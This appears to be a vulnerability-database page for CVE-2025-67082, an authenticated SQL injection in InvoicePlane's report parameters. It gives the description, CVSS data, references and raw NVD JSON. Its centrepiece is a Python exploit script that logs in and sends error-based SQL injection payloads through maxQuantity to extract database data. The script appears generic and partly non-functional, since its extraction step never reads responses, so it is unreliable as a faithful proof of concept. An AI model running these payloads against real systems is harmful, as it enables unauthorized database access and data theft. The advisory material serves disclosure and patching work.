CVE-2025-67082

Description

An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:* - VULNERABLE

InvoicePlane < 1.6.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-67082 PoC - InvoicePlane SQL Injection # Target: InvoicePlane <= 1.6.3 # Vector: maxQuantity/minQuantity parameters in report generation TARGET_URL = "http://target-website.com/index.php/reports/generate" USERNAME = "[email protected]" PASSWORD = "password123" def login(session): """Authenticate to InvoicePlane""" login_url = f"{TARGET_URL.replace('/reports/generate', '/session/login')}" data = { "email": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data) return "login_success" in response.text or response.status_code == 200 def exploit_sql_injection(session): """Execute SQL injection via maxQuantity parameter""" # Error-based SQL injection payload to extract database version # The single quote breaks the original query, enabling injection payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END) AND '1'='1" data = { "reportType": "inventory", "maxQuantity": payload, "minQuantity": "0", "submit": "Generate" } try: response = session.post(TARGET_URL, data=data, timeout=10) if response.status_code == 200: # Check for SQL error messages indicating successful injection if "Division by 0" in response.text or "SQLSTATE" in response.text: print("[+] SQL Injection successful - Error-based extraction possible") return True return False except Exception as e: print(f"[-] Error: {e}") return False def extract_data(session): """Extract database information using error-based SQL injection""" # Payload to extract database user payloads = [ "1' AND (SELECT COUNT(*) FROM users) > 0 AND '1'='1", "1' AND (SELECT SUBSTRING(version(),1,10)) AND '1'='1" ] for payload in payloads: data = { "reportType": "inventory", "maxQuantity": payload, "minQuantity": "0" } response = session.post(TARGET_URL, data=data) # Process response to extract data print(f"[*] Payload sent: {payload}") if __name__ == "__main__": session = requests.Session() print("[*] Starting CVE-2025-67082 exploitation...") if login(session): print("[+] Authentication successful") if exploit_sql_injection(session): print("[+] SQL Injection confirmed") extract_data(session) else: print("[-] Authentication failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67082
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67082
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67082/
[4] VulDB https://vuldb.com/cve/CVE-2025-67082
[5] https://github.com/InvoicePlane/InvoicePlane
[6] https://www.helx.io/blog/advisory-invoice-plane/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67082", "sourceIdentifier": "[email protected]", "published": "2026-01-15T15:15:51.213", "lastModified": "2026-01-22T16:04:15.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in \"maxQuantity\" and \"minQuantity\" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL en InvoicePlane hasta la versión 1.6.3 ha sido identificada en los parámetros 'maxQuantity' y 'minQuantity' al generar un informe. Un atacante autenticado puede explotar este problema mediante inyección SQL basada en errores, permitiendo la extracción de datos arbitrarios de la base de datos. La vulnerabilidad surge de la sanitización insuficiente de las comillas simples."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.4", "matchCriteriaId": "17C261C3-0A6B-4D07-8370-DD3C71097DE2"}]}]}], "references": [{"url": "https://github.com/InvoicePlane/InvoicePlane", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-invoice-plane/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}